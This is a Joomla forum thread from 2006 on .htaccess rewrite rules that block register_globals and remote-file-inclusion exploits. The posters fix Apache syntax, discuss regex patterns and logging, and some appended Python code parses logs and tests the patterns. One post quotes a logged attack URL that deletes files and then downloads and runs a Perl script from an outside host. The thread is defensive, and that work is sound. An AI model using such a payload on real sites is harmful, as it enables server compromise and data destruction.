Discussion for: Using .htaccess files to block exploit attempts

Discussion regarding Joomla! security issues.

infograf768
Joomla! Master
Posts: 18747
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Discussion for: Using .htaccess files to block exploit attempts

Post by infograf768 » Sun Jul 09, 2006 5:15 am

This condition gives a 500 server internal error here:
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [R=403,L]
Result:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@xxxxx and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Log:
[Sun Jul  9 00:13:18 2006] [alert] [client xxx] /home/xxxpublic_html/xxx/.htaccess: RewriteRule: invalid HTTP response code for flag 'R'
Last edited by RobS on Thu Jul 13, 2006 9:40 am, edited 1 time in total.
Jean-Marie Simonet / infograf · http://www.info-graf.fr
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 5:35 am

Try changing it to [F,L]; that should produce the same effect.  Which version of Apache are you running?
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

infograf768
Joomla! Master
Posts: 18747
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Using .htaccess files to block exploit attempts

Post by infograf768 » Sun Jul 09, 2006 5:52 am

F, L did the trick.

In the 2 cases, host and locally, Apache is 1.3.33
Jean-Marie Simonet / infograf · http://www.info-graf.fr
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

infograf768
Joomla! Master
Posts: 18747
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Using .htaccess files to block exploit attempts

Post by infograf768 » Sun Jul 09, 2006 5:53 am

Suggestion:

If there is no drawback, it would be good to include this in the htaccess default installed file.
Jean-Marie Simonet / infograf · http://www.info-graf.fr
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 6:00 am

I have considered that but as I said before it is largely untested so far.  Additionally, it might impede on some functionality that I have not considered yet so it would need to be thoroughly tested before I made any kind of push to get this installed in the default .htaccess.  On the other hand, I think it would be a good idea if a set of rules like this were maintained to keep up with the most popular security vulnerabilities and possibly stop them before they become bigger threats.  I have basically been trying to do that myself which has been fairly easy so far because most of the logged attacks I have seen are pretty similar in form and the code they try.  I am just worried that these rewrite conditions might create some strange behavior like the people who were having issues with mod_security and 'psy' and 'properly'.  I have tried my best to keep it sane but only testing will prove if it works or not.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

albi
Joomla! Explorer
Posts: 273
Joined: Fri Aug 19, 2005 12:47 pm
Contact:

Using .htaccess files to block exploit attempts

Post by albi » Sun Jul 09, 2006 7:59 am

I will post the trick at the Greek Forum just now

Thank you
Demetris Dimarelis
http://www.e-orama.com, Web Services & Internet Marketing in Greece & Albania

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 8:03 am

Alright, just make sure you post a big warning that it hasn't been tested very thoroughly!
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

albi
Joomla! Explorer
Posts: 273
Joined: Fri Aug 19, 2005 12:47 pm
Contact:

Using .htaccess files to block exploit attempts

Post by albi » Sun Jul 09, 2006 8:06 am

I just posted the link to your post here, because I have some hacked sites reported by the forum members
http://forum.joomla.org/index.php/topic ... #msg388584
Thank you
Demetris Dimarelis
http://www.e-orama.com, Web Services & Internet Marketing in Greece & Albania

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 8:08 am

Alright, that is probably a good idea in case there are any more changes that need to be made to the script, I can just post them to this thread.  So, stay tuned J! users  ;)
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

albi
Joomla! Explorer
Posts: 273
Joined: Fri Aug 19, 2005 12:47 pm
Contact:

Using .htaccess files to block exploit attempts

Post by albi » Sun Jul 09, 2006 11:18 am

Patch applied successfully with the modification [R=403,L] to [F,L]
Demetris Dimarelis
http://www.e-orama.com, Web Services & Internet Marketing in Greece & Albania

vscribe
Joomla! Enthusiast
Posts: 207
Joined: Thu Jun 01, 2006 3:16 pm
Location: Texas, USA
Contact:

Using .htaccess files to block exploit attempts

Post by vscribe » Sun Jul 09, 2006 1:25 pm

Hello

We are hosted at http://www.godaddy.com. I just applied the .htaccess patch and did the [F,L]

It produces the 500 Internal server error.

Any ideas?

Here is the change (making sure I actually did it correctly)

# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [R=403,F,L]


We are running 1.0.10

Thanks :(
cmsconnection.com/forum - the multi-cms forum

infograf768
Joomla! Master
Posts: 18747
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Using .htaccess files to block exploit attempts

Post by infograf768 » Sun Jul 09, 2006 5:10 pm

@vscribe

Error in your text.
It is:
RewriteRule ^(.*)$ index.php [F,L]
Jean-Marie Simonet / infograf · http://www.info-graf.fr
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

vscribe
Joomla! Enthusiast
Posts: 207
Joined: Thu Jun 01, 2006 3:16 pm
Location: Texas, USA
Contact:

Using .htaccess files to block exploit attempts

Post by vscribe » Sun Jul 09, 2006 5:37 pm

That was it! Thank you!

I'll start testing, but looks ok now.

Thank you again - vscribe :)
cmsconnection.com/forum - the multi-cms forum

Joomlamahesh
Joomla! Apprentice
Posts: 34
Joined: Mon Nov 28, 2005 5:00 pm
Location: Mumbai, India
Contact:

Using .htaccess files to block exploit attempts

Post by Joomlamahesh » Sun Jul 09, 2006 5:42 pm

I have also applied this to my .htaccess file. Got the same internal server error that everybody is mentioning but then changed

RewriteRule ^(.*)$ index.php [R=403,L] to

RewriteRule ^(.*)$ index.php [F,L]

Now everything is working fine at my site on http://www.khagolmandal.com

My site was also hacked on 30th June and I had to reload the whole thing. Earlier I was using 1.0.8; now I have installed 1.0.10, but as there were reports on this forum about 1.0.10 hacks also, I am using this .htaccess file.

Let's see the result, as I have reloaded the site since 8th July 2006.
A man is not finished when he is defeated,
He is finished when he quits

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 5:48 pm

I am curious, all the people that had to make the changes to the script's last line, the [F,L] part... Are you all on Apache 1.3.x?  I wrote the script on a server running 2.2.x so it might be a matter of newer syntax.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

Joomlamahesh
Joomla! Apprentice
Posts: 34
Joined: Mon Nov 28, 2005 5:00 pm
Location: Mumbai, India
Contact:

Using .htaccess files to block exploit attempts

Post by Joomlamahesh » Sun Jul 09, 2006 6:03 pm

I am on

Linux Kernel version 2.4.20-43.7.legacy
Apache version 1.3.36 (Unix)
PHP version 4.4.2
MySQL version 4.1.19-standard
A man is not finished when he is defeated,
He is finished when he quits

mwep
Joomla! Apprentice
Posts: 13
Joined: Wed Mar 01, 2006 9:05 pm

Using .htaccess files to block exploit attempts

Post by mwep » Sun Jul 09, 2006 6:04 pm

Apache/1.3.36
PHP 4.4.2

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 6:12 pm

That is what I figured.  I edited the script's last rule tags to [F,L] as that is compatible with more versions of Apache.  It works on 2.2.x also.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

limestone
Joomla! Enthusiast
Posts: 109
Joined: Fri Sep 02, 2005 7:35 pm
Location: UK

Using .htaccess files to block exploit attempts

Post by limestone » Sun Jul 09, 2006 11:36 pm

I just updated htaccess on 3 sites on 2 servers with (apparently) no ill effects. Anything that helps block these exploits must be a good thing and thanks to RobS for that.

Just a thought - my knowledge of what you can and can't do with htaccess is sketchy at best - if these additions do block any attacks we won't know about it. Is there any way for attempts to be logged?

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 11:46 pm

It should log a 403 error for index.php in your log file.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
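
Following the reply above about finding blocked attempts in the log, here is an added example (not from the thread) that lists requests answered with 403 for index.php in an access log and counts them per client. It assumes Apache's Common Log Format; the log lines and addresses are constructed samples and the function names are hypothetical.

```python
import re
from collections import Counter

# Apache Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [09/Jul/2006:23:50:01 +0000] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 18211
198.51.100.7 - - [09/Jul/2006:23:50:07 +0000] "GET /index.php?_REQUEST=&GLOBALS=&mosConfig_absolute_path=x HTTP/1.0" 403 289
198.51.100.7 - - [09/Jul/2006:23:50:09 +0000] "GET /index.php?GLOBALS=&option=com_content HTTP/1.0" 403 289
192.0.2.10 - - [09/Jul/2006:23:51:12 +0000] "GET /administrator/secret.txt HTTP/1.1" 403 301
203.0.113.44 - - [09/Jul/2006:23:52:30 +0000] "GET /index.php?searchword=%24_REQUEST%5B HTTP/1.1" 403 289
this line is not in log format
"""


def blocked_requests(log_text, script="index.php"):
    """Return (host, time, query) for every request to `script` answered with 403."""
    hits = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m or m.group("status") != "403":
            continue  # unparseable line, or not a forbidden response
        path, _, query = m.group("target").partition("?")
        if path.rsplit("/", 1)[-1] == script:
            hits.append((m.group("host"), m.group("time"), query))
    return hits


def hits_per_client(hits):
    """Count blocked requests per client address."""
    return Counter(host for host, _, _ in hits)


if __name__ == "__main__":
    hits = blocked_requests(SAMPLE_LOG)
    for host, when, query in hits:
        print(f"{when}  {host}  ?{query}")
    for host, count in hits_per_client(hits).most_common():
        print(f"{count:3d} blocked request(s) from {host}")
```

The query string is kept in each hit so that a blocked legitimate request, such as the search in the last sample line, can be told apart from an exploit attempt.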

RobinH
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Using .htaccess files to block exploit attempts

Post by RobinH » Mon Jul 10, 2006 12:05 am

Your .htaccess hack worked fine on my server, and it's got the latest of everything as I just upgraded all the server software plus all Apache attributes in the last month (boy was that fun).

Question for you - I've also seen some comments about changing Register Globals: ON to Register Globals: OFF, but isn't that a part of the php.ini file?  I do know that this does help deter some hacks, but if it's in the root php.ini file then that would affect any php files on the server.  Is there a way of doing this in the .htaccess file?  I'm sure there is but as others have mentioned, the .htaccess file and how it's set up is almost a mystery...

Oh and thanks for this tip!!!

friesengeist
Joomla! Guru
Posts: 842
Joined: Sat Sep 10, 2005 10:31 pm

Using .htaccess files to block exploit attempts

Post by friesengeist » Mon Jul 10, 2006 12:10 am

RobinH wrote: Question for you - I've also seen some comments about changing Register Globals: ON to Register Globals: OFF, but isn't that a part of the php.ini file?  I do know that this does help deter some hacks, but if it's in the root php.ini file then that would affect any php files on the server.  Is there a way of doing this in the .htaccess file?  I'm sure there is but as others have mentioned, the .htaccess file and how it's set up is almost a mystery...

As of Joomla! 1.0.4, you can change your "emulated" setting of register_globals in /globals.php. So if you don't have access to this setting in your server config, you can at least emulate it for Joomla!

/**
 * Use 1 to emulate register_globals = on
 * 
 * Use 0 to emulate register_globals = off
 */
define( 'RG_EMULATION', 1 );
We may not be able to control the wind, but we can always adjust our sails

RobinH
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Using .htaccess files to block exploit attempts

Post by RobinH » Mon Jul 10, 2006 12:15 am

Ahhh did find it there. Have hesitated to change my php.ini file as I'm not sure of the effect on all the other packages I have running. Afraid if I turn Register Globals off it'll have some effect other than what I want.  I guess I should try it just to see.

I did see this script in my globals.php file, thanks for the hint.

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Mon Jul 10, 2006 12:16 am

RobinH wrote: Question for you - I've also seen some comments about changing Register Globals: ON to Register Globals: OFF, but isn't that a part of the php.ini file?  I do know that this does help deter some hacks, but if it's in the root php.ini file then that would affect any php files on the server.  Is there a way of doing this in the .htaccess file?  I'm sure there is but as others have mentioned, the .htaccess file and how it's set up is almost a mystery...

Try putting this code in your .htaccess. I have not tested this, though.  It might work, it might not; it depends on how PHP is configured, I imagine.

php_flag register_globals off
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

peacypeace
Joomla! Apprentice
Posts: 17
Joined: Mon Jun 05, 2006 7:28 am
Location: jordan-amman
Contact:

Using .htaccess files to block exploit attempts

Post by peacypeace » Mon Jul 10, 2006 7:36 am

I'm working with IIS 5.1 (Windows XP) ....Can I use the .htaccess file you wrote...if not how can I solve the problem... I got hacked once already...I did all I can to tighten security on the IIS...

Thanx in advance
Life is your playground ,but it's my school...

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Mon Jul 10, 2006 7:44 am

It should work.  Let me know how it goes if you decide to try it.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

friesengeist
Joomla! Guru
Posts: 842
Joined: Sat Sep 10, 2005 10:31 pm

Using .htaccess files to block exploit attempts

Post by friesengeist » Mon Jul 10, 2006 8:03 am

Hi Robert,
first of all, many thanks for taking the time to come up with this!

Some small suggestions:
RobS wrote:

# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

As globals.php already deals with this, I think one could strip this from your .htaccess.

RobS wrote:

# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

$_REQUEST is an array of user input anyway, so why should we want to make sure a user doesn't mess around with it?

Both remarks are not really important. The thing is, every regexp takes some time to execute, so I think we should try to do as little as possible. It's probably only a matter of microseconds (or even less), but still, that all sums up at some point...

Thanks again for your work on this!
We may not be able to control the wind, but we can always adjust our sails

albi
Joomla! Explorer
Posts: 273
Joined: Fri Aug 19, 2005 12:47 pm
Contact:

Using .htaccess files to block exploit attempts

Post by albi » Mon Jul 10, 2006 8:12 am

I used it at one of my sites with no success

the site was hacked last night.

I think they used the vulnerability at extcalendar but I'm not sure about this

http://forum.joomla.org/index.php/topic ... #msg389163
Last edited by albi on Mon Jul 10, 2006 8:32 am, edited 1 time in total.
Demetris Dimarelis
http://www.e-orama.com, Web Services & Internet Marketing in Greece & Albania

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Mon Jul 10, 2006 8:32 am

friesengeist wrote:
As globals.php already deals with this, I think one could strip this from your .htaccess.


$_REQUEST is an array of user input anyway, so why should we want to make sure a user doesn't mess around with it?

Both remarks are not really important. The thing is, every regexp takes some time to execute, so I think we should try to do as little as possible. It's probably only a matter of microseconds (or even less), but still, that all sums up at some point...

Thanks again for your work on this!

Honestly, I am not up to date on the function of globals.php.  I hadn't really looked at what it does/how it works.  I will have to read up on it.  As for the comment on the $_REQUEST array, I included it I guess as double protection against scripts like this:

/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%
5d=1&GLOBALS=&mosConfig_absolute_path=http://bbs.mbig.cn/tool.gif?&cmd=cd%20/tmp/;rm%20-rf%20*;fetch%
20http://bbs.mbig.cn/bt.pl;wget%20http://bbs.mbig.cn/bt.pl;curl%20-O%20http://bbs.mbig.cn/bt.pl;perl%20bt.pl;perl%
20bt.pl.1;perl%20bt.pl.2?
And from what I understand you can access $_COOKIE through $_REQUEST which might be worth attempting to protect against to prevent some kind of session hijacking via hand crafted cookie values.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
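
An added example, not part of the thread: a small regression check for the two RewriteCond patterns discussed above, run against constructed query strings to surface false positives of the kind worried about earlier in the discussion. Python's `re` module stands in for Apache's regex engine here, and the function names and test cases are hypothetical.

```python
import re

# The two conditions quoted in the thread, verbatim. RewriteCond performs an
# unanchored match on the raw (not URL-decoded) query string, which re.search
# reproduces. Assumption: Python's re stands in for Apache's regex engine;
# these patterns use no engine-specific syntax.
CONDITIONS = {
    "GLOBALS": re.compile(r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})"),
    "_REQUEST": re.compile(r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})"),
}


def matched_conditions(query_string):
    """Names of the conditions that fire; the rules are chained with [OR]."""
    return [name for name, rx in CONDITIONS.items() if rx.search(query_string)]


def is_blocked(query_string):
    """True if at least one condition matches, i.e. the request gets the 403."""
    return bool(matched_conditions(query_string))


# Constructed regression cases: (description, query string, should it be blocked?)
CASES = [
    ("normal article view",
     "option=com_content&task=view&id=5&Itemid=1", False),
    ("shape of the request logged in the thread",
     "_REQUEST=&_REQUEST%5boption%5d=com_content&GLOBALS=&mosConfig_absolute_path=x", True),
    ("site search for the word GLOBALS",
     "option=com_search&searchword=GLOBALS", False),
    ("site search for $_REQUEST['id']",
     "option=com_search&searchword=%24_REQUEST%5B%27id%27%5D", False),
]


def false_verdicts(cases=CASES):
    """Cases where the rule set disagrees with the expected verdict."""
    return [(desc, qs) for desc, qs, expected in cases if is_blocked(qs) != expected]


if __name__ == "__main__":
    for desc, qs, expected in CASES:
        verdict = "403" if is_blocked(qs) else "pass"
        flag = "" if is_blocked(qs) == expected else "  <-- unexpected"
        print(f"{verdict}  {desc}: {matched_conditions(qs)}{flag}")
```

The last case is reported as unexpected: a visitor searching the site for PHP help on `$_REQUEST['id']` is refused, because the encoded bracket after `_REQUEST` satisfies the second pattern.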

RobS
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Mon Jul 10, 2006 8:34 am

albi wrote: I used it at one of my sites with no success

the site was hacked last night.

I think they used the vulnerability at extcalendar but I'm not sure about this

http://forum.joomla.org/index.php/topic ... #msg389163

Albi, if you could look through your logs and find the exploit that they used I would be happy to attempt to address it via a rewrite rule.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

